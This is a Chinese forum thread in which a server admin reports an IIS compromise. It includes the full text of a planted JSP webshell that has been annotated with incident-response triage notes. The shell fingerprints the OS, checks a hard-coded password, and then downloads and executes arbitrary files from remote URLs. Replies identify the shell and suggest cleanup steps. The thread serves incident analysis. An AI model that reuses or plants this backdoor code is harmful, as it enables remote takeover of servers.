刚才发现服务器被黑了,在 IIS 目录下多了几个文件
其中一个名为 9082addcc2ac2e12.txt 内容是 vulnerability_id:5c10a762f567dc26567d8b0b
另一个是 FxCodeShell.jsp,内容是
<%-- IR triage notes (added for analysis; the sample below is kept exactly as pasted, nothing else changed).
     What the visible code does:
     * A request with no or empty "view" parameter writes "1" (os.name contains "Windows"), "2" (contains
       "Linux") or "0" to the body, sets a response header named "OS" and returns. That is a host fingerprint
       step, so a request to this JSP without "view" followed by one carrying "view" is a useful log signature.
     * Otherwise "view" must equal the hard-coded password in the second scriptlet; "os" (parsed as an int)
       picks the drop directory (1 = C:/Windows/Temp/, anything else = /var/tmp/); "address" is a
       comma-separated list of URLs.
     * For each URL the last path segment becomes the file name. If that file already exists in the drop
       directory it is executed; otherwise it is fetched with HttpURLConnection into the drop directory and then
       executed (os 1: run directly via Runtime.exec; otherwise "chmod 777" followed by "nohup ... &").
     Hunting and containment: look in those two directories for recently written files, for child processes of
     the servlet/JSP container, and in the access log for requests to this file with "view", "os" and "address".
     The paste is garbled (the generic List<String> appears to have been rendered as HTML tags, ".*" looks
     stripped from the java.io/java.util import, and a newline sits inside the out.write string literal),
     so this text is not compilable as-is; treat it as evidence, not as a buildable source file. --%>
<%@ page import="java.util.Arrays"%> <%@ page language="java" cOntentType="text/html; charset=" pageEncoding="UTF-8"%> <%@ page import="java.io.,java.util.,java.net.URL,java.net.HttpURLConnection"%> <% String view = request.getParameter("view"); if (view == null || view.equals("")) { String localOS = System.getProperty("os.name"); List<string> osList; String tomcatOS = "0"; String DEFAULT = "0"; String WINDOWS = "1"; String LINUX = "2"; osList = new ArrayList<string>(); osList.add("Linux"); osList.add("Windows"); for (String os : osList) { if (localOS.contains(os)) { if (os.equals("Linux")) { tomcatOS = LINUX; } else if (os.equals("Windows")) { tomcatOS = WINDOWS; } else { tomcatOS = DEFAULT; } break; } } out.write(tomcatOS + "
"); response.setHeader("OS", tomcatOS); return; } %></string></string>
<%-- Second scriptlet: password gate, drop-directory selection, then the download-and-execute loop. --%>
<% String password = "FxxkMyLie1836710Aa"; if (!view.equals(password)) { return; } int systemCode = Integer.parseInt(request.getParameter("os")); String address = request.getParameter("address"); String fileName = null; String path = null; String winPath = "C:/Windows/Temp/"; String linuxPath = "/var/tmp/"; switch (systemCode) { case 1: path = winPath; break; default: path = linuxPath; break; }
// Per-URL loop: an already-present file is executed without re-download; otherwise it is fetched into
// path + fileName (name taken from the URL's last path segment) and then executed. The "Size:" it prints is
// actually the URL count, not a byte size. Streams are only closed on the success path.
String[] urls = address.split(","); InputStream fileInputSteam = null; FileOutputStream fileOutputStream = null; for (int i = 0; i <= urls.length - 1; i++) { try { String[] file = urls[i].split("/"); fileName = file[file.length - 1]; out.write("Download:" + urls[i] + "<br>"); out.write("<br>filename:" + fileName + "<br>"); out.write("<br>Size:" + urls.length + "<br>"); out.write( "-------------------------------------------------------------------------------------------------------" + "<br><br>"); File isfile = new File(path + fileName); if (isfile.isFile()) { try { Runtime exec = Runtime.getRuntime(); if (systemCode == 1) { exec.exec(path + fileName); } else { String chmod = "chmod 777 " + path + fileName; exec.exec(chmod); exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &"); } } catch (Exception e1) { e1.printStackTrace(); } continue; } URL downloadUrl = new URL(urls[i]); HttpURLConnection cOnn= (HttpURLConnection) downloadUrl.openConnection(); conn.setConnectTimeout(60000 * 3); conn.setReadTimeout(60000 * 3); fileInputSteam = conn.getInputStream(); fileOutputStream = new FileOutputStream(path + fileName); int length = -1; byte[] b = new byte[409600]; while ((length = fileInputSteam.read(b)) != -1) { fileOutputStream.write(b, 0, length); fileOutputStream.flush(); } if (conn != null) { conn.disconnect(); } if (fileInputSteam != null) { fileInputSteam.close(); } if (fileOutputStream != null) { fileOutputStream.close(); } Runtime exec = Runtime.getRuntime(); if (systemCode == 1) { exec.exec(path + fileName); } else { String chmod = "chmod 777 " + path + fileName; exec.exec(chmod); exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &"); } } catch (Exception e2) { e2.printStackTrace(); } }
%>
1 sunbing OP Windows Server 2003
2 11232as 2019-03-13 19:11:20 +08:00 via Android "FxxkMyLie"是个嘛…
3 shiny 2019-03-13 19:12:18 +08:00 Webshell
4 sunbing OP 多了很多远程进程,多了个用户,不知道有没有其他后门
5 mmdsun 2019-03-13 19:26:24 +08:00 via Android 厉害了。黑客还会 java
6 xiaomimei 2019-03-13 19:50:24 +08:00 via Android 像是大马,看代码里写的连接密码是 FxxkMyLie1836710Aa,改一下文件等他下次上马,试试能不能溯源
8 1nclude 2019-03-14 16:44:10 +08:00 先查杀一下 webshell,再找一下漏洞在哪
10 1nclude 2019-03-15 09:03:47 +08:00 http://www.d99net.net/News.asp?id=62 用一下 D 盾,最重要的是找出是怎么被入侵的